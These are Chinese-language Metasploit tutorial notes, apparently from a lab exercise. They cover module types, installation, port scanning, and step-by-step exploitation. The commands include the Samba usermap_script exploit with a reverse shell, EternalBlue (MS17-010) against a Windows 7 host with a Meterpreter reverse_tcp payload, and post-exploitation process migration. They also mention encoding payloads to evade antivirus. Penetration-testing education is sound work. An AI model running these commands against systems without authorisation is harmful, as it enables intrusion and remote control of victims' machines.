目录
Metasploit模块
1、Exploit :渗透测试攻击:缓冲区溢出、Web应用程序漏洞攻击、系统配置错误
2、Payload :攻击载荷;
3、Shellcode :指令: Meterpreter Shell
4、Module :模块;
( 1 ) Payload Module ,渗透测试攻击模块;
辅助模块: auxiliary module ,简称: AUX
(2)NOPModule;
( 3 ) Encoding Module ,编码器模块;
( 4 ) POST Module ,后渗透攻击模块
使用MSF渗透测试时,大致步骤
- 扫描目标系统,寻找可以利用的漏洞
- 选择并配置一个漏洞利用模块
- 选择并配置一个攻击载荷模块
- 选择一个编码技术,用来绕过杀毒软件的查杀
- 渗透攻击
MSF使用
1.kali下使用
msfdb
msfdb init
msfconsle
db_status
2.其他linux
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && \
chmod 755 msfinstall && \
./msfinstall
addusermsf
su msf
cd /opt/metasploit-framework/bin/
./msfconsole
主机扫描
查找扫描模块
search portscan
使用扫描模块
use auxiliary/scanner/portscan/tcp
辅助模块还有其他扫描模块,如Mysql,VNC,FTP,SMB
使用nmap扫描
nmap 192.168.0.104 -sV -p 1-1000 -T4
搜索和使用samba的漏洞利用模块
search samba
use exploit/multi/samba/usermap_script
show PAYLOADS
set PAYLOAD cmd/unix/reverse
set RHOSTS 192.168.0.104
set RPORT 445
set LHOST 192.168.0.109
show options
exploit
后渗透攻击:信息收集
使用ms17-010对win7进行渗透
nmap 192.168.0.106 -p-
search ms17_010
use exploit/windows/smb/ms17_010_eternalblue
show payloads
set payload windows/x64/meterpreter/reverse_tcp
设置参数
exploit
进程迁移
getpid
ps
migrate 4312
kill 1128
run post/windows/manage/migrate #自动进程迁移